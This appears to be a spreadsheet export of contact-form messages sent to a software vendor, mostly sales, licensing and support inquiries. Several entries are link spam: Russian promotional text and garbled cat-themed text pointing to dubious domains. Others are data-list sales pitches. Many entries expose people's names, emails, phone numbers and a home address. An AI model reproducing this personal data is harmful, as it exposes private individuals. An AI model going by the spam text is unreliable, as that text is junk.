Здесь: http://kinorulez.ru/drama/10487-hrupkost-fragiles-sezon-1-2-20122013.html _x000D_
http://kinorulez.ru/uzhasy/ [b] 2017 в хорошем качестве лучшие ужасы [/b] _x000D_
[url=http://kinorulez.ru/komediya/] 2017 в хорошем качестве лучшие комедии [/url] _x000D_
[url=http://kinorulez.ru/melodrama/] 2017 смотреть лучшие мелодрамы [/url] 2017 смотреть лучшие мелодрамы</t>
  </si>
  <si>
    <t>Looking for pricing information</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am an analyst with The Smart Cube (www.thesmartcube.com), a London-based professional services firm providing strategic procurement advisory services to our clients._x000D_
_x000D_
We have been engaged by Novartis, a global pharma company, to identify potential providers for Clinical Document Management Services._x000D_
_x000D_
We have identified your company as one of the key players in this field. To help us better understand your organization’s service capabilities, we would appreciate if you could fill the attached RFI document, latest by 19 January, 2018._x000D_
_x000D_
Additionally, we can also schedule a short telephonic discussion for clarifying our objective and cater to any query/doubt that you may have._x000D_
_x000D_
Look forward to your reply._x000D_
Regards,_x000D_
Sahil</t>
  </si>
  <si>
    <t>1-209-922-9292</t>
  </si>
  <si>
    <t>Wanted to know what it would take/need to move to 10.6 from 10.5. Cost etc.. also it does not appear we have any support contracts in place?_x000D_
Thanks</t>
  </si>
  <si>
    <t>любого человека в жизни могут сложиться серьезные финансовые разрывы, которые можно преодолеть только с помощью серьезных финансовых вливаний. Читайте об этом подробнее на сайте [url=http://gdefile.ru]gdefile.ru[/url]</t>
  </si>
  <si>
    <t>Login account/profile</t>
  </si>
  <si>
    <t>FirstClass server support, serial #1010687</t>
  </si>
  <si>
    <t>When I tried to login and create new password, "AD credential error" message appearing</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign? We have 7,816 leads Oracle PeopleSoft customer  from  UK._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">S.g. Damen und Herren,_x000D_
bezüglich des Produktes Brava Desktop sind mir die Lizenzoptionen nicht klar/ersichtlich._x000D_
Single Seat / Network Use --&gt; Sind hier beide Varianten MAC Adresse gebunden oder gibt es auch eine User Based Lizenzierung?_x000D_
_x000D_
Anforderungen:_x000D_
bitte teilen Sie uns die Kosten für_x000D_
a)	Variante mac-gebunden für 15 Lizenzen_x000D_
b)	Variante Network wenn concurrent für 10 Lizenzen_x000D_
mit._x000D_
_x000D_
_x000D_
Beste Grüße_x000D_
_x000D_
Patrick Kriegl_x000D_
Information Technology (IT)_x000D_
IT Contract &amp; License Manager_x000D_
 _x000D_
ANDRITZ AG_x000D_
Stattegger Strasse 18_x000D_
8045 Graz_x000D_
Austria_x000D_
Phone +43 (316) 6902-1037_x000D_
patrick.kriegl@andritz.com_x000D_
www.andritz.com_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
die Firma Constellation Brands aus den USA hat sich für ihre Dokumenten-Verwaltung OpenText angeschafft. Da Ziemann ein Lieferant von Constellation Brands ist bekam ich die Aufgabe Dokumente mit OpenText zu verwalten bzw. die Freigabeprozesse in Opentext zu nutzen. Leider funktioniert das nicht immer reibungslos. Bei Problemen muss ich mich an den Projektleiter in Mexiko wenden, der das Problem mit seiner IT löst bzw. es an den OpenText-Support weitergibt. Da es eine Zeitverschiebung gibt, ist ein direkter Kontakt unmöglich. Haben sie ein Helpdesk Deutschland, dass ich anstatt kontaktieren kann. Denn grad bei Dokumentenbewegungen bzw. -freigaben spielt Zeit für mich eine große Rolle. Auch würde ich mich gerne wegen technischer Fragen über OpenText mit einem Ihrer Kollegen oder Kolleginnen am Telefon oder persönlich unterhalten. Ist das möglich?_x000D_
Bitte kontaktieren Sie mich MO - FR zwischen 7:00 - 12:00 und 12:45 - 16:00 telefonisch oder über obengenannte Email._x000D_
Vielen Dank im Voraus_x000D_
Gruß_x000D_
Andreas Vomhoff</t>
  </si>
  <si>
    <t>Professional Services for SAP ERP/CRM/EWM Data Archiving</t>
  </si>
  <si>
    <t>Hi_x000D_
I'm not after a demo as such, but I've been asked to put together a list of possible Document Management Systems, with a brief description of functionality and rough cost estimate. Is there any way you could provide a very general idea of cost to implement and run Coreworx as a document control system._x000D_
_x000D_
Thanks_x000D_
Kim</t>
  </si>
  <si>
    <t>I need access to mysupport and downloads.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a venezuelan physician. I want to join to your team. I am a translator french-spanish, italian-spanish and english-spanish  (free-lancer). My preferred areas are: Medical Sciences, Life Sciences and Social Sciences. I offer to translate in a quickly and responsible way. I have a experience for 20 years in this work. Thanks for all. _x000D_
Luis Alfonso Colmenares Suárez MD, MSc candidate.     _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
My husband is having 9+ yrs experience in OpenText Teamsite and currently looking for a job in Malaysia. Could you please refer him. _x000D_
His name - VIVEK THAPA_x000D_
mail id - thapa.viv@gmail.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Can this solution (OpenText Automated Output Accessibility) be integrated with SAP Crystal Reports?   Is so, how would it work?_x000D_
_x000D_
Thanks,_x000D_
Lloyd_x000D_
</t>
  </si>
  <si>
    <t>Hi, I am Jin-Ah Park manager of News Jelly, a company specializing in data visualization._x000D_
_x000D_
I would like to briefly introduce our company through this mail and suggest a meeting to develop into future business partnership._x000D_
_x000D_
We are the Tableau of Asia._x000D_
Do you know a data visualization solution like Tableau or Power BI? Tableau is the largest visualization solution with a market capitalization of over 8 billion dollar. We are the Tableau of Asia. However, we have more attractive features than existing solutions._x000D_
_x000D_
1) The nice pricing policy - As a per-domain licensing policy once introduced, everyone uses it._x000D_
2) So Simple solution installation and usage - Usage training within 30 minutes, Solution Installation within maximum 1~2 days._x000D_
3) It can be used by anyone, even if not a few experts. - The secret is AI-based data processing technology - Data extraction and automatic refinement, visualization type recommendation function._x000D_
_x000D_
☞ Learn more our solution: https://youtu.be/nxAkmUvCrxk_x000D_
☞ Company &amp; Product Introduction : https://goo.gl/yEX5Vu_x000D_
_x000D_
We are a Korean company, but we are starting to enter the Singapore market from the end of January, 2018. If you are interested in our solutions or want to be a business partner of any type, please register your desired meeting schedule at the link below. Or reply to this email address or my Skype ID._x000D_
_x000D_
applying for meeting: https://goo.gl/forms/qEhD3ehK7YoNm6WG2_x000D_
email: sallarv@newsjel.ly_x000D_
Skype ID: Jinah Park_x000D_
_x000D_
From January 22 to February 8, our base in Singapore is shown below._x000D_
Venue: ACE International Centre, 67 Ayer Rajah Crescent #04-16, JTC LaunchPad @ one-north, S139950_x000D_
_x000D_
Sometimes it’s easiest just to get together and I can show you the materials and chat face to face._x000D_
_x000D_
I look forward to meeting you in person._x000D_
_x000D_
Thank you._x000D_
_x000D_
Best Regards,_x000D_
Jinah Park</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I work at an accounting firm. One of my clients uses BizManager and TrustedLink. Can you please confirm whether a SOC 1 report is available for these systems and how they can obtain it?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Любой вид спорта, будь то альпинизм или спортивная борьба, развивает в человеке все качества. Думаю, спортом заниматься может только неординарный человек, который может преодолеть себя, сумеет себя заставить, подробнее об этом читайте на сайте [url=http://fi-hi.ru]fi-hi.ru[/url]</t>
  </si>
  <si>
    <t>Dont know</t>
  </si>
  <si>
    <t xml:space="preserve">licence instructions email says "Please visit: http://support.opentext.com and follow the below steps:_x000D_
_x000D_
    Click on Accounts on the Top Menu"_x000D_
There is no "Accounts" on the top menu at _x000D_
https://login.opentext.com/connect/sso_controller-main?cams_login_config=http&amp;cams_original_url=http%3A%2F%2Fsupport.opentext.com%3A80%2F&amp;cams_security_domain=system&amp;cams_reason=7_x000D_
</t>
  </si>
  <si>
    <t>looking to download and try the first class platform looking for demo server software</t>
  </si>
  <si>
    <t xml:space="preserve"> Top 5 DogUrineOdorRemovers eBay Your browser indicates if you've visited this link Top 5 DogUrineOdorRemovers . ... should alwayhs have some type of  OMGPETUrineandOdorEliminator is thebestsolution for such ...   Mre results.&lt;br&gt; AdoptableCats-CATS- Kentucky Humane Society Your browser indicates if you've visiterd this link Welcome to the official Kentucky Humane Society Website  /cats More results.&lt;br&gt;  _x000D_
 [URL=http://cat-claw-marks.gq/cat-drinking-a-lot-of-water-diarrhea/]Cat drinking a lot of water diarrhea[/URL] [URL=http://when-a-cat-licks-you.ml/how-to-train-your-kitten-to-go-toilet-outside/]How to train your kitten to go toilet outside[/URL]  _x000D_
 Inter-Regional Residential ACAT Psychotherapy Training (IRRAPT) in Cognitive Analytic Therapy (CAT) 2018 - 2019 Closing Date for Applications extended  AnalyticTherapy - Counselling Directory&lt;/u&gt;.&lt;br&gt; &lt;h3&gt;7 Simlpe and Amazing Home Remedies for Cats with Colds&lt;/h3&gt;.&lt;br&gt;  _x000D_
cat training institutes in trivandrum _x000D_
 _x000D_
 14 Aug 2017 ... Dogs and cats do emit behavioral signs of ipmending aggression that are ... Unprovoked Aggression: When a cat is aggressive for sermingly no reason. .... Cat attacks are no laughing matter, and aside from the frequently reported  My cat became upset when the parrot bit me and caused me fo  aggression: when good cats attack - The Conscious Cat&lt;/i&gt;.&lt;br&gt; &lt;i&gt;BestFleaTreatment for Dogs &amp;Cats- 2017 - Consumersearch Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
  [URL=http://bouquet-of-kittens.tk/math-cats-mailroom-2/]Math Cats Mailroom[/URL] [URL=http://bouquet-of-kittens.tk/your-thought-forces-and-the-way-to-make-use-of-them-quantity-1/]Your Thought Forces And the way To make use of Them Quantity 1[/URL]  _x000D_
 Labrador Retrievers: What'sGoodAbout 'Em? What's Bad About 'Em? Your browser indicates if you've visited this link Labrador Retrijevers: the most honest dog breed review you'll ever find about Labrador Retriever temperament, personality, and behavior.   More results.&lt;br&gt; Whi</t>
  </si>
  <si>
    <t>Hello OpenText!_x000D_
I'm Moesha from the UPLB Computer Science Society and we are looking for sponsors for our 35th Computer Science Week event. May I know who I can contact to send a proposal to?</t>
  </si>
  <si>
    <t>Hello,_x000D_
We have recently discovered that we have paid for our support contract twice. I have tried to contact our account representative but haven't received a response. Could you tell me who we would need to contact at your company to receive a refund?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>My name is Scott McGregor and I am the coach/captain of Team Canada Slo-Pitch team that is traveling to the Dominican Feb 23rd-March 2nd. This will be our 4th year going to play slo-pitch. As part of this trip we collect baseball equipment to give to the kids of Dominican. I'm told that you may have a budget to help out with this. Some companies have provided us with funds to purchase baseball equipment or have run a drive at work to collect used equipment. Please let me know if this is something you would like to be a part of. Thanks so much!</t>
  </si>
  <si>
    <t>I am interested in getting a document management system</t>
  </si>
  <si>
    <t>I'd like a quote to purchase Right Fax for use by 5 administrative staff members in our department.  I'm not clear on whether we can use a cloud-based app; I don't think the City of Austin will approve that, but perhaps I'm mistaken.  I'd like to discuss, please. I'm here until 5:15pm Central Time.  Thank you!</t>
  </si>
  <si>
    <t>We are running App X ver 8.1 now on our network which was resold through Jack Henry &amp; Associates (Symitar)_x000D_
We have few questions on the life of the product, development, support etc. and any upgrades, enhancements that is planned or would this be phased out_x000D_
We need to plan accordingly_x000D_
Call me next week please</t>
  </si>
  <si>
    <t>Support contract access</t>
  </si>
  <si>
    <t>Good morning please tell me about the Quickscan pro 4.71.0 software, Thanks for the attention</t>
  </si>
  <si>
    <t>Having trouble sending a fax. We use 9 to access outside lines in our business--do we have to include the 9 in our number when faxing? Do we need to use dashes? Do we need to add a 1 to the number string for non-local calls. I looked through the manual but did not see these questions addressed. Thank you</t>
  </si>
  <si>
    <t>Hello, we are a engineering consultant company, and we are looking for a software that allow as manage all the documents of the company and contractors of differents engineering and construction projects, so can you give me the specifications of Documentum and the prices of the licences? Thank you in advance</t>
  </si>
  <si>
    <t>We are interested in implementing an Imaging Software to electronically capture our AP Invoices and have this imaging system compatible to SAP.  We would like to have a demo if you do offer a solution as currently we have a manual process which we would like to automate.  Please email to discuss next stages.  We are very keen to view a demo as soon as possible.  Thanks,</t>
  </si>
  <si>
    <t>We bought OpenDeploy a while back and am wondering if we still have support.  I work at Affymetrix which is now a part of Thermo Fisher.  Thanks.</t>
  </si>
  <si>
    <t>I would like to learn more about OpenText offering that could be used to replace the ERMX module in ApplicationXtender.</t>
  </si>
  <si>
    <t>Brava Viewer for SharePoint or Brava Viewer for Desktop--need to understand these better and possibly demo.</t>
  </si>
  <si>
    <t>I would like to be contacted by a Sales Executive supporting Florida and/or the Property and Casualty insurance sector.  UPC Insurance is in the market for, and actively seeking, a document management / ECM solution.  Please contact me ASAP at the phone number or email noted above.</t>
  </si>
  <si>
    <t>If we were to purchase Brava Desktop for a Terminal Server environment, how does the pricing work?  Thank you</t>
  </si>
  <si>
    <t>Emailing invoices rather than mailing them.  Especially with your 15 day payment terms &amp; the fact that we only cut checks for this branch of our company, we prefer the invoices to be emailed to the above email address.  This is also where you can reach me at for payment status inquiries.  Please confirm that this change has been made.  Thanks so much -- hope you have a great weekend!_x000D_
Kari  :-)</t>
  </si>
  <si>
    <t>Earlier i use to login to Opentext knowledge center with the below credentials._x000D_
Due to some issue, currently i am not able to login now. Can you please help me in resolving this issue._x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t>SAAS Platform, Dynamic visualization, Market Research, Interactive Dashboards - CREATIVE_x000D_
_x000D_
Attn: CEO / Marketing Director_x000D_
_x000D_
My name is Haris Cizmic and I am a professional creative artist for over 15 years. During my US Agency career time (in Detroit), I worked for clients  like Ford, Lincoln, Chevy, Sony, MTV, Fox, etc. In the last 10 months, I’ve re-designed look and feel of your competitor Dapresy (hired by their CEO Tobi Antersen I've designed their website, print stuff, online media, all presentations, sales decks, schematics, many inforgraphics and story-telling dashboards, animated logos, video demo reels, animated banners, webinar videos, etc.) As you probably know, Dapresy "transforms market research &amp; customer experience into visual dashboards" that I’ve brought to another level, since their artists were pretty poor. Now, after getting funded well, they are changing ways of work, and instead of having me alone taking care of everything, they’ve hired a large advertising agency in Sweden. I am not sure if I should feel hurt or flattered, but it is what it is._x000D_
_x000D_
I got very familiar with the Industry and I liked working for it. Please take a quick look at my (selected, not complete) work for Dapresy here  -  http://hariscizmic.com/dapresy-work/_x000D_
_x000D_
I worked for them from Sarajevo, Bosnia, where I live now with my family. We used to have weekly conference calls, and I was directly under their US marketing team. Being a workaholic, I didn’t mind woking many weekends, holidays and nights in order to meet all the deadlines, do many versions and corrections for all the teams (Sweden German, Australian, British, US…)._x000D_
_x000D_
Since I’ve heard about your company from Dapresy people more than once (they are quite scared of you), I’ve decided to contact you offering some creative work, on a contract, freelance or a part time basis. I am very good at what I do (and very fast). Plus, I usually have killer ideas:)_x000D_
_x000D_
Thank you for your time and consideration,_x000D_
Sincerely,_x000D_
_x000D_</t>
  </si>
  <si>
    <t>I am unable to access the Product support knowledge base and documentation for the company. It is sending a confirmation email to my ID and I have confirmed it. But it is still not letting me access any of the documentation.</t>
  </si>
  <si>
    <t>Looking for prices for Rightfax</t>
  </si>
  <si>
    <t>I am looking at options to partner with a business for wholesale or resale fax from the desktop services.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I am contacting you from Business Reporter at the Telegraph in relation to a campaign I have just started on "The Future of Supply Chains"._x000D_
_x000D_
I wanted to have a discussion with someone at Op[en Text to learn about the work you do in the sector._x000D_
_x000D_
If it was something relevant to the angle I was positioning the campaign - a series of informative interviews, highlighting the necessity of transforming supply chain infrastructure - I would also like to discuss possible involvement within this series. _x000D_
_x000D_
If somebody could contact me back either on the email address I have given or on my number I would love to start this conversation. _x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Lana_x000D_
</t>
  </si>
  <si>
    <t>cannot access ebook at http://evantage.gilmoreglobal.com/#/books</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Démarrage projet GED pour remplacer toute la gestion documentaire au sein de plusieurs mutuelles avec liaison au niveau des sites web (espace adhérent)._x000D_
Demande urgente_x000D_
Cordialement </t>
  </si>
  <si>
    <t>We've received a Radianz 4,265.00 payment today without invoice/ customer name/account remittance. Would you please provide?</t>
  </si>
  <si>
    <t>Hi, I really love your company. Can you please send me some complimentary memorabilia, stickers, or both? My address is:_x000D_
_x000D_
Aron Greenstein_x000D_
1336 E 14TH ST._x000D_
Brooklyn, NY 11230_x000D_
USA</t>
  </si>
  <si>
    <t>I need to install this on my pc and start testing our cd's and import documents. I need help to install.</t>
  </si>
  <si>
    <t>Need documentation on how to configure RightFax to work for our organization through an externally link and through a smart device when end users work remotely.</t>
  </si>
  <si>
    <t>Please provide pricing for Object Nationalizer for Gupta compatible with Report Builder 6.2 and Visual 8.  Thank you!</t>
  </si>
  <si>
    <t>Licensing availability.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking at the Enterprise Scan solution for our daily invoice digitalization. </t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon, please could you provide a contact email so we can set yourself up on our system? we would like to make a purchase but are unable to do so without some setup details? Thanks Sophie_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are receiving a transmission error every time a fax comes through.  I am using Windows 10 with Rightfax 10.6.3 on a lenovo laptop.  We use this program to receive orders and other inquiries from customers.  We determined that every fax no matter where it was sent from comes in as a transmission error.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign? We have 3,115  leads  Saleforce customer  from  France._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
hiermit Frage ich eine grobe Kostenschätzung für ein ECM mit beinhaltenden DMS, Input- / Output Management und Workflowmanagement an._x000D_
_x000D_
Dieses ECM ist bei meinem Auftraggeber, ein ca. 300 Mitarbeiter großes Unternehmen im Maschinen- / Anlagenbau, umzusetzen, dabei soll in mehreren Schritten eine Vielzahl der im Unternehmen befindlichen Dokumenten mit den zugrundeliegenden Workflows in das ECM überführt werden. Das ECM soll aus SAP heraus gesteuert werden sowie Schnittstellen für SAP beinhalten._x000D_
_x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Dennis Albers</t>
  </si>
  <si>
    <t xml:space="preserve">We are an IT reseller in the UK  - Please send us pricing for  EnCase eDiscovery </t>
  </si>
  <si>
    <t xml:space="preserve">googmorning I am Andrea Goldoni,_x000D_
am an actuate freelancer, and I would like to use the new correspondent products from_x000D_
opentext, whoch should be the  folowing:_x000D_
_x000D_
_x000D_
2-6151 Using Big Data Analytics_x000D_
_x000D_
2-6101 Working with BIRT Reporter Designer _x000D_
2-6103 Using the OpenText Analytics Designer _x000D_
4-6108 Using BIRT Integration APIs _x000D_
... now, I don't like the idea of an oline training, can I have a training on real class_x000D_
with the teacher ?_x000D_
_x000D_
thanx in advance_x000D_
andrea goldoni_x000D_
</t>
  </si>
  <si>
    <t>I am interested in OpenText Document Management solution for 50-70 users with about 150 GB of files to be stored, processed and archived. Can I have a quote and a technical documentation how the solution is installed, administered and used by end users?_x000D_
_x000D_
Regards,_x000D_
Andi Resuli.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
_x000D_
bei der Recherche nach ECM/DMS Anbietern sind wir auf Ihr Unternehmen aufmerksam geworden. _x000D_
_x000D_
Im Rahmen der Anbieterauswahl würden wir Sie gerne zu einem ersten Termin in unserem Hause einladen, um mehr über Ihre Lösungen zur "Rechnungseingangsverarbeitung" zu erfahren. _x000D_
_x000D_
Aktuell planen wir unseren papierbasierten und manuellen Rechnungsbearbeitungsprozess in allen 72 Gesellschaften _x000D_
(europaweit) auf eine moderne elektronische Workflowlösung umzustellen. _x000D_
_x000D_
Langfristig möchten wir insbesondere die Lieferanten von Handelswaren mit hohem Volumen aber auch über EDI (EANCOM) anbinden._x000D_
_x000D_
Wir würden diesen ersten Termin gerne auf 2-3 Stunden beschränken. _x000D_
_x000D_
Gerne können wir uns noch telefonisch im Vorfeld über die genaueren Details austauschen. _x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
i. A. Jonas Arnsmann</t>
  </si>
  <si>
    <t>Wir benötigen ein ECM System und recherchieren momentan in verschiedene Richtungen. Können Sie mir Informationen zu Lizensierungsmodellen und/oder Preisen von opentext zu schicken? Vielen Dank</t>
  </si>
  <si>
    <t>Do you have business /sales in China? _x000D_
we want to implement workflow system same as our parent company use your workflow system.</t>
  </si>
  <si>
    <t>Hi, I just want to enquire as documentum is already under Opentext, where can I get the CMIS adapter to documentum 7.3 so I can connect to my documentum using CMIS calls._x000D_
_x000D_
Please advise</t>
  </si>
  <si>
    <t>I'm sending as Shanghai China branch of Japanese company. If we want to buy and use "Brava Desktop" in China, how do we buy it from you? We would be appreciate it if you tell us by Email asap. Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching for business services on yellowpages.com.au._x000D_
_x000D_
And I was wondering if you would like to partner up? _x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your services online and increase your website conversion rate._x000D_
_x000D_
_x000D_
So I wanted to offer you a 30 second animated explainer video for your so product for just $197. (including script/voiceover)_x000D_
_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more and get started at www.30secondexplainervideos.com/explainer-promo_x000D_
_x000D_
Or can you shoot me a quick email for a brief discussion!_x000D_
_x000D_
Cheers, Travis _x000D_
www.30secondexplainervideos.com/explainer-promo_x000D_
</t>
  </si>
  <si>
    <t>Есть несколько овощей, которые полезны вне сезона и потому обязательно должны быть включены в рацион питания. Об этом рассказали эксперты, при этом одним из таких полезнейших овощей они назвали обыкновенную капусту. Читайте об этом подробнее на сайте [url=http://medinfon.ru]medinfon.ru[/url]</t>
  </si>
  <si>
    <t>Requesting My Support access</t>
  </si>
  <si>
    <t>Как сообщал , в начале декабря во Французских Альпах в результате схода лавины погибли три туриста. Их тела нашли у подножий гор Дан де Кроль и Гран Сом, подробнее читайте на сайте [url=http://dk-zio.ru]dk-zio.ru[/url]</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Arizona State University is interested in a digital asset management solution. We have an RFP that we'd like to invite you to respond to. Please provide the email address and phone number of the group or individual you'd like us to send this to._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello _x000D_
I think i have contacted you before but it has been a while.  We have an older OTFA device that is no longer supported and it has reached the end of life.  WE need a quote for a replacement.  The solution has to serve an law form of 15-20 users.  Has to have a print  to fax ability form the user's PCs, it must be compatible with SBS2001 and WIN7 PRO machines, tie in to active directory for authentication and user addition like our current OTFA and must be able to send failure/sucess notices._x000D_
Our current device is on premise and is fed by an analog telephone line we use for faxing._x000D_
Would you be able to quote me on something adequate._x000D_
Thank you </t>
  </si>
  <si>
    <t>We are looking for a fax service to replace the MyFax service we are using with NextGen.</t>
  </si>
  <si>
    <t>Just wanted to let you know te redirect for http://www.kazeon.com/ seems to be broken and sends you to the Sucuri Website Firewall page.  _x000D_
You may want to check into that sometime soon._x000D_
The redirect for http://kazeon.com seems to work normally, as it forwards you to the OpenText site._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Paul</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring our 2.5+ million Global Healthcare and Pharmaceutical Email database?_x000D_
_x000D_
Our healthcare database includes:_x000D_
_x000D_
•	Doctors and Physicians with 120+ specialities_x000D_
•	Decision makers from medical offices, hospitals across all departments_x000D_
•	Decision makers from Pharmaceutical companies_x000D_
•	Nurses_x000D_
•	Pharmacies, Pharmacists and other healthcare sites etc…_x000D_
_x000D_
Our database includes verified email address along with multi channel marketing detail like NPI Number, company name, company website, contact name, contact title, address, phone, fax, SIC Code, employee size, revenue size, SIC code, industry descriptions etc_x000D_
_x000D_
Among other services we offer: Global B2B list, custom list, Technology list, email appending and other data appending services._x000D_
_x000D_
Please let me know your interest and schedule for a quick call to discuss in detail. If there is someone else in your organization that I need to speak in this regard, I would be very grateful if you could provide their details or forward this email to him/her, thanks in advance for your help!_x000D_
_x000D_
Await your response…._x000D_
_x000D_
Best Regards,_x000D_
Amber Perrett_x000D_
www.krystalcommunication.com_x000D_
</t>
  </si>
  <si>
    <t>I am looking for the release notes for eDOCS DM10 so I can find out if this software would be compatible with Windows Server 2012 or Windows Server 2012 R2. Can I please have access to this kind of information?</t>
  </si>
  <si>
    <t>Follow up after my contact person (John Trainor &lt;jtrainor@opentext.com&gt;) left OpenText</t>
  </si>
  <si>
    <t>We are looking for a document magement system to manage/control/distribute training materials.  Does OpenText have such features?  Could I get a demonstration of the technology?</t>
  </si>
  <si>
    <t xml:space="preserve">We have been using Free DWG Viewer and we'd like to get pricing information for Desktop DXP.  Your website has pricing for up to 24 licenses and we would need approximately 200. Is there a price break for an order of this size. </t>
  </si>
  <si>
    <t>Please grant access to Support for my account. TIA!</t>
  </si>
  <si>
    <t>Hello,  could you please email me GXS's W-9?</t>
  </si>
  <si>
    <t>I want to make some distributor in Philippines</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h4&gt;Ideal Pet 6.25 in. x 6.25 in. SmallCatFlapCatDoorwith ... Your browser indicates if you'v isited this link&lt;/h4&gt;.&lt;br&gt; &lt;strong&gt;RemovingCatUrine Smell- Top 3 Homemade Remedies ... -  Your browserr indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
 [URL=http://cat-claw-marks.gq/the-best-cat-repellents-for-gardens/]The best cat repellents for gardens[/URL] [URL=http://cat-stress-spray.gq/cat-ears-flat-side/]Cat ears flat side[/URL]  _x000D_
 8 Р°РІРі. 2017 Рі. -To celebrate internationalcatday, our readers share their average picturesof cats , pitcures of averagecats , and average pictures of  Is the Life Span of the Common Cat? - The Spruce&lt;/h3&gt;.&lt;br&gt; I've seen cats knead on just about anything softf, inculding people. It's a pleasant motion for them, mroe akin to giving themselves a massage than massaging the thing  Do Cats Knead ? -  SciShow tackles one of the cutest questions ever: Why cats knead. You might have heard the theoyr, but do you know what adult cats would hold on to jitten  Do Cats Knead ?   Whether you efrer to it as "making biscuits" or just plain kneading, we've found a few answers to the age-old question: Whu do cats knerad?.&lt;br&gt;  _x000D_
where to byu bengal cat in malaysia _x000D_
 _x000D_
 Explore LГёnne Norreen's board " Colorful cats /art" on Pinterest.  See more ideas about Cats, Cat art and Cat  best Colorful cats/art images on Pinterest  Cats, Cat art and Cat  Cats ! on Scratch by rainbowfireball20.  Cats ! by raionbowfireball20. scripts. sprites. See inmside. Oh no! We're having trounle displaying  cats! on Scratch - MIT&lt;/u&gt;.&lt;br&gt; MaleCatNames Your browser indicates if you've visited this lnik We offer 1000's of malecatnames that you can browse and save to view later. There are many origins and categories to choose from to help you pick the    More results.&lt;br&gt;  _x000D_
  [URL=http://spayed-cat-cost.tk/automatic-cat-repellent/]Automatic cat repellent[/URL] [URL=http://cat-claw-marks.gq/the-best-cat-repellents-for-gardens/]The best cat repellents for gardens[/URL]  </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour _x000D_
Merci de me contacter au plus vite au 06 62 00 58 93  ou sur mon fixe au 1 77 93 67 09. _x000D_
Un point sur l'ensemble de nos contrats doit être fait. _x000D_
Cordialement, </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to upgrade eDoc DM from 5.3 to the current version.  Please send me a quote for </t>
  </si>
  <si>
    <t>Bonjour, _x000D_
Je souhaiterai avoir des renseignements sur vos solutions d'impression derrière SAP Formulaire Smartform avec fusion de documents PDF ou XPS stockés sur des files systèmes et envoi à des imprimantes Postscript. _x000D_
Merci._x000D_
Florent LE DRET</t>
  </si>
  <si>
    <t>Account email and password change.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a solutions and applications specialist with xerox that supports US reps in the field, and I am looking for information about the service you provide in Documentum for one of the agencies I work with.  If you could contact me by email that would be great. I did get word that Xerox does have a partnership so I am looking for the information needed for this.  </t>
  </si>
  <si>
    <t>GSK Supplier Portal - Invitation_x000D_
_x000D_
GSK is introducing a new online tool called GSK Supplier Portal, to make it easier for Suppliers like yourself to view and manage your company data, to make sure the information we hold on record is accurate and up-to-date and if not, to correct it. Good data quality means it's more likely you'll be paid on time._x000D_
_x000D_
What does this change mean for me_x000D_
_x000D_
As an important Supplier and partner for us, GSK invites you to register online on the Supplier Portal._x000D_
_x000D_
Once you register, you'll be able to view, update and submit changes to the information we hold, including company name, address, tax numbers, bank accounts, purchase order and remittance email addresses. In addition, you can add other contacts, upload relevant documents and work collaboratively with GSK via the Supplier Portal._x000D_
_x000D_
Next Steps_x000D_
_x000D_
Step 1: Reply to this email confirming the key contact’s email address. This person/group will be responsible to update and maintain the data in the portal. _x000D_
_x000D_
We will then send the key contact 2 emails from “GSK_SupplierPortal”, one containing your temporary username &amp; instructions, the second containing a temporary password._x000D_
_x000D_
Step 2: Complete the registration with the details provided in the 2 emails._x000D_
_x000D_
Once you have completed registration you can login to the Supplier Portal to view, update, and submit any changes to your company data as necessary. Note that following registration, you must login with your email address as your username, together with the password you have chosen during registration._x000D_
_x000D_
Important: Once registered on the Supplier Portal, if you make a change to your bank details, you must upload confirmation of the bank details on company letterhead in PDF format. _x000D_
GSK requires this confirmation to comply with our internal procedure._x000D_
_x000D_
